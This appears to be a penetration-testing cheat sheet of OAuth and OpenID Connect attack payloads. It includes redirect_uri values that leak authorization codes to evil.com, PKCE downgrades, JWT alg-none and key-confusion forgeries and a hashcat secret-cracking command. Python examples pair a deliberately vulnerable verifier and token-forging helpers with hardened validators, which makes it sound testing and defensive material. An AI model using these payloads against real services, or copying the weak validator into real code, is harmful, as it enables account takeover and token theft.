OAuth 2.0 and OpenID Connect attack techniques including CSRF via missing state, open redirect in redirect_uri, token scope escalation, and PKCE bypass. (19 payloads)
CSRF via missing or unbound state

1. GET /oauth/authorize?client_id=app&redirect_uri=https://app.com/callback&response_type=code
   No state parameter. If the client accepts a callback without one, an attacker can deliver their own authorization code to the victim's browser (login CSRF) and link the victim's session to the attacker's account.

2. GET /oauth/authorize?client_id=app&redirect_uri=https://app.com/callback&response_type=code&state=ATTACKER_CONTROLLED_VALUE
   state is present but not bound to the user's session. Check whether the callback compares the returned state against a value stored server-side for this session and rejects a mismatch; a state that is merely echoed back gives no CSRF protection.

Open redirect and code leakage via redirect_uri

3. GET /oauth/authorize?client_id=app&redirect_uri=https://evil.com&response_type=code
   No redirect_uri validation at all: the code is sent straight to the attacker.

4. GET /oauth/authorize?client_id=app&redirect_uri=https://app.com.evil.com&response_type=code
   Prefix or substring match on the host. The registered value must be compared exactly, not with startswith or contains.

5. GET /oauth/authorize?client_id=app&redirect_uri=https://app.com/callback/../../../redirect?url=https://evil.com&response_type=code
   Path traversal on the allowed host to reach an open redirect on the same site; the code leaks through the chained redirect.

6. GET /oauth/authorize?client_id=app&redirect_uri=https://app.com/callback%0a%0dhttps://evil.com&response_type=code
   CRLF in the parameter. Tests validators that stop comparing at the first control character and servers that reflect the value into the Location header (response splitting).

7. Check the Referer header on the callback page: the code sits in the query string and leaks in Referer to every third-party script or resource the page loads, unless the client redirects immediately and sets a restrictive Referrer-Policy.

8. Look for the authorization code in server-side logs, analytics and CDN access logs; anything that records full request URLs records codes.

9. GET /oauth/authorize?client_id=app&redirect_uri=https://app.com/callback&response_type=token
   Implicit flow. The access token is returned in the URL fragment and is exposed to browser history, Referer and any script on the page. Also check whether a client registered for response_type=code is allowed to switch to token.

Scope escalation

10. POST /oauth/token
    scope=admin openid profile
    Request a broader scope in the token request body than the user authorized. The server must not issue more than was granted at authorization time.

11. GET /oauth/authorize?client_id=app&scope=admin+openid+profile&response_type=code
    Request a privileged scope in the authorization request. Check whether the consent screen shows it and whether the server grants scopes the client is not registered for.

PKCE bypass

12. Remove code_verifier from the token exchange POST body and check whether the server still returns a token. A code issued with a code_challenge must only be redeemable with a matching verifier (invalid_grant otherwise).

13. Send code_challenge_method=plain instead of S256 in the authorization request (or omit the method, which RFC 7636 defaults to plain), then redeem the code with code_verifier equal to the code_challenge. With plain, anyone who saw the challenge in the authorization URL (Referer, logs) can redeem the code; the server should accept S256 only.

JWT and ID token attacks

14. {"alg":"none"}
    Set alg to none, strip the signature and resubmit; a verifier that dispatches on the header's alg accepts it.

15. hashcat -m 16500 jwt_token.txt rockyou.txt
    Offline brute force of an HS256 secret (mode 16500 is JWT). A cracked secret lets you mint arbitrary tokens.

16. {"alg":"HS256"}
    Algorithm confusion: change an RS256 header to HS256 and sign with the IdP's public key as the HMAC secret. A verifier that passes the RSA public key to whatever algorithm the header names will validate it.

17. Decode the ID token and check whether the aud claim is validated: swap aud to another client_id. A token issued to one client must not be accepted by another.

18. Replay an ID token carrying an old nonce value and check whether the server rejects it; the nonce must match the one stored for the current login and be usable once.

19. Decode the ID token, swap the sub claim to another user ID, re-sign and submit. This only works with a recovered or confused key (15, 16), so it doubles as the test that signature validation is actually enforced.
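The redirect_uri, state and PKCE checks that payloads 1 to 6, 12 and 13 exercise, written out as an added example that is not part of the original cheat sheet: a deliberately weak prefix-match redirect_uri validator beside the exact-match one, a client that binds state and an S256 challenge to its session, and a minimal authorization server that enforces both at /oauth/token. The client id app, the registered URI https://app.com/callback and the in-memory session dict are constructed for the demo; the code speaks no HTTP and models the two endpoints as functions.

```python
import base64
import hashlib
import hmac
import secrets
from urllib.parse import parse_qsl, quote, urlsplit

# Constructed values for this example: client "app" has exactly one registered redirect URI.
CLIENT_ID = "app"
REGISTERED_REDIRECT = "https://app.com/callback"


def weak_redirect_check(redirect_uri):
    """Common broken validator: prefix match. Passes app.com.evil.com, /../ traversal and CRLF."""
    return redirect_uri.startswith("https://app.com")


def strict_redirect_check(redirect_uri):
    """Exact byte comparison with the registered value (RFC 6749 3.1.2.2): no prefix, no normalising."""
    return hmac.compare_digest(redirect_uri.encode(), REGISTERED_REDIRECT.encode())


def b64url_sha256(text):
    """base64url(SHA-256(text)) without padding: the S256 transform of RFC 7636."""
    digest = hashlib.sha256(text.encode()).digest()
    return base64.urlsafe_b64encode(digest).rstrip(b"=").decode()


def build_authorization_request(session):
    """Client side: a fresh state and an S256 challenge, both bound to this user's session.
    The verifier stays in the session until the token request."""
    state = secrets.token_urlsafe(32)
    verifier = secrets.token_urlsafe(64)          # 86 chars, within RFC 7636's 43..128
    session["oauth_state"] = state
    session["pkce_verifier"] = verifier
    return ("/oauth/authorize?response_type=code"
            f"&client_id={CLIENT_ID}"
            f"&redirect_uri={quote(REGISTERED_REDIRECT, safe='')}"
            f"&state={state}"
            f"&code_challenge={b64url_sha256(verifier)}"
            "&code_challenge_method=S256")


def query_params(url):
    """Parse a URL's query string into a dict (demo helper)."""
    return dict(parse_qsl(urlsplit(url).query))


def callback_state_ok(session, returned_state):
    """Client callback: state must exist, be single-use and match the session's copy,
    so a missing state or an attacker-chosen one (payloads 1 and 2) is rejected."""
    expected = session.pop("oauth_state", None)
    if expected is None or returned_state is None:
        return False
    return hmac.compare_digest(expected.encode(), returned_state.encode())


class AuthorizationServer:
    """Minimal AS: codes are bound to an S256 challenge and PKCE is enforced at /oauth/token."""

    def __init__(self):
        self.codes = {}   # code -> code_challenge

    def authorize(self, params):
        if params.get("client_id") != CLIENT_ID:
            return {"error": "unauthorized_client"}
        if not strict_redirect_check(params.get("redirect_uri", "")):
            return {"error": "invalid_request", "error_description": "redirect_uri not registered"}
        # RFC 7636 treats a missing method as "plain"; refuse everything but S256 (payload 13).
        if params.get("code_challenge_method") != "S256" or not params.get("code_challenge"):
            return {"error": "invalid_request", "error_description": "S256 PKCE required"}
        code = secrets.token_urlsafe(16)
        self.codes[code] = params["code_challenge"]
        return {"code": code, "state": params.get("state")}

    def token(self, params):
        # A code is consumed by its first exchange attempt, successful or not: that also
        # stops an attacker from guessing the verifier against a stolen code.
        challenge = self.codes.pop(params.get("code"), None)
        if challenge is None:
            return {"error": "invalid_grant"}
        verifier = params.get("code_verifier")
        if not verifier:                          # payload 12: no verifier, no token
            return {"error": "invalid_grant", "error_description": "code_verifier required"}
        if not hmac.compare_digest(b64url_sha256(verifier).encode(), challenge.encode()):
            return {"error": "invalid_grant", "error_description": "PKCE verification failed"}
        return {"access_token": secrets.token_urlsafe(24), "token_type": "Bearer"}


if __name__ == "__main__":
    uri = "https://app.com.evil.com"
    print(uri, "weak:", weak_redirect_check(uri), "strict:", strict_redirect_check(uri))
    session, server = {}, AuthorizationServer()
    params = query_params(build_authorization_request(session))
    print(server.token({"code": server.authorize(params)["code"]}))   # no verifier: refused
```

Run the four redirect_uri payloads through both validators to see which ones the prefix match lets through; only https://evil.com fails it, the other three pass and only exact comparison stops them. The token endpoint refuses a missing verifier, a wrong verifier and a reused code, and the authorize endpoint refuses the plain downgrade before a code is ever issued.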
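The ID token payloads 14 to 19 (alg none, RS256 to HS256 confusion, secret brute force, aud and sub rewriting, nonce replay) as an added example, not code from the original page: a forge/tamper helper, a verifier that commits the classic mistake of dispatching on the header's alg with one key object, a wordlist check that does what hashcat -m 16500 does at scale, and a hardened validator that pins the algorithm and checks iss, aud, exp and a single-use nonce. It assumes the IdP signs ID tokens with HS256 under the client secret (OIDC Core permits this; with RS256 the pinned branch would call an RSA verifier instead of HMAC), and ISSUER, CLIENT_ID, CLIENT_SECRET and the placeholder public-key PEM are constructed values.

```python
import base64
import hashlib
import hmac
import json
import time

# Constructed values for this example, not taken from any real deployment.
ISSUER = "https://idp.example"
CLIENT_ID = "app"
CLIENT_SECRET = b"s3cret"                    # HS256 key shared by the IdP and the RP "app"
# Stand-in for the IdP's RSA public key as a confused verifier would hold it (not a real key).
RSA_PUBLIC_KEY_PEM = b"-----BEGIN PUBLIC KEY-----\nNOT-A-REAL-KEY\n-----END PUBLIC KEY-----\n"


def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def unb64url(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def hs256(key, data):
    return hmac.new(key, data, hashlib.sha256).digest()


def make_jwt(claims, alg="HS256", key=CLIENT_SECRET):
    """Issue or forge a token. alg="none" gives the empty-signature form (payload 14);
    alg="HS256" with key=RSA_PUBLIC_KEY_PEM is the RS256-to-HS256 confusion forgery (payload 16)."""
    header = {"alg": alg, "typ": "JWT"}
    signing_input = ".".join(b64url(json.dumps(p, separators=(",", ":")).encode()) for p in (header, claims))
    if alg == "none":
        return signing_input + "."
    if alg == "HS256":
        return signing_input + "." + b64url(hs256(key, signing_input.encode()))
    raise ValueError("demo supports HS256 and none only")


def split_jwt(token):
    h, c, s = token.split(".")                   # (header, claims, raw header, raw claims, raw sig)
    return json.loads(unb64url(h)), json.loads(unb64url(c)), h, c, s


def tamper(token, alg, key, **new_claims):
    """Attacker helper: rewrite claims such as sub or aud and re-sign under a chosen alg and key."""
    claims = split_jwt(token)[1]
    claims.update(new_claims)
    return make_jwt(claims, alg=alg, key=key)


def vulnerable_verify(token, verification_key):
    """Anti-pattern: alg comes from the attacker-controlled header and one key object serves every
    branch, so the RSA public key loaded for RS256 becomes the HMAC secret for HS256.
    (The RS256 branch is left out: it needs an RSA library and the bug is in the dispatch.)"""
    header, claims, h, c, s = split_jwt(token)
    if header.get("alg") == "none":
        return claims
    if header.get("alg") == "HS256":
        if hmac.compare_digest(hs256(verification_key, f"{h}.{c}".encode()), unb64url(s)):
            return claims
    return None


def crack_hs256(token, wordlist):
    """Offline secret guessing, the same test hashcat -m 16500 runs at scale (payload 15)."""
    _, _, h, c, s = split_jwt(token)
    signature = unb64url(s)
    for word in wordlist:
        if hmac.compare_digest(hs256(word.encode(), f"{h}.{c}".encode()), signature):
            return word
    return None


class IdTokenValidator:
    """RP-side validation after OIDC Core 3.1.3.7: pinned alg and key, iss, aud, exp, single-use nonce."""
    def __init__(self, key=CLIENT_SECRET, client_id=CLIENT_ID, issuer=ISSUER, now=time.time):
        self.key, self.client_id, self.issuer, self.now = key, client_id, issuer, now
        self.consumed_nonces = set()

    def verify(self, token, expected_nonce):
        """Return (claims, None) on success or (None, reason) on rejection."""
        try:
            header, claims, h, c, s = split_jwt(token)
            signature = unb64url(s)
        except ValueError:                       # covers JSON, base64 and split errors
            return None, "malformed token"
        if header.get("alg") != "HS256":         # the alg is pinned; the header does not choose it
            return None, "unexpected alg"
        if not hmac.compare_digest(hs256(self.key, f"{h}.{c}".encode()), signature):
            return None, "bad signature"
        if claims.get("iss") != self.issuer:
            return None, "wrong issuer"
        aud = claims.get("aud")
        aud = aud if isinstance(aud, list) else [aud]
        if self.client_id not in aud or (len(aud) > 1 and claims.get("azp") != self.client_id):
            return None, "wrong audience"        # payload 17
        if claims.get("exp", 0) <= self.now():
            return None, "expired"
        nonce = claims.get("nonce")
        if nonce is None or nonce != expected_nonce or nonce in self.consumed_nonces:
            return None, "nonce missing, mismatched or replayed"   # payload 18
        self.consumed_nonces.add(nonce)
        return claims, None
```

Mint a valid token with make_jwt, then feed the none and HS256-with-public-key forgeries from tamper to both verifiers: vulnerable_verify returns the forged claims for each, IdTokenValidator rejects them with "unexpected alg" and "bad signature", a second presentation of a genuine token fails on the consumed nonce, and crack_hs256 recovers s3cret from a small wordlist the way hashcat would from rockyou.txt.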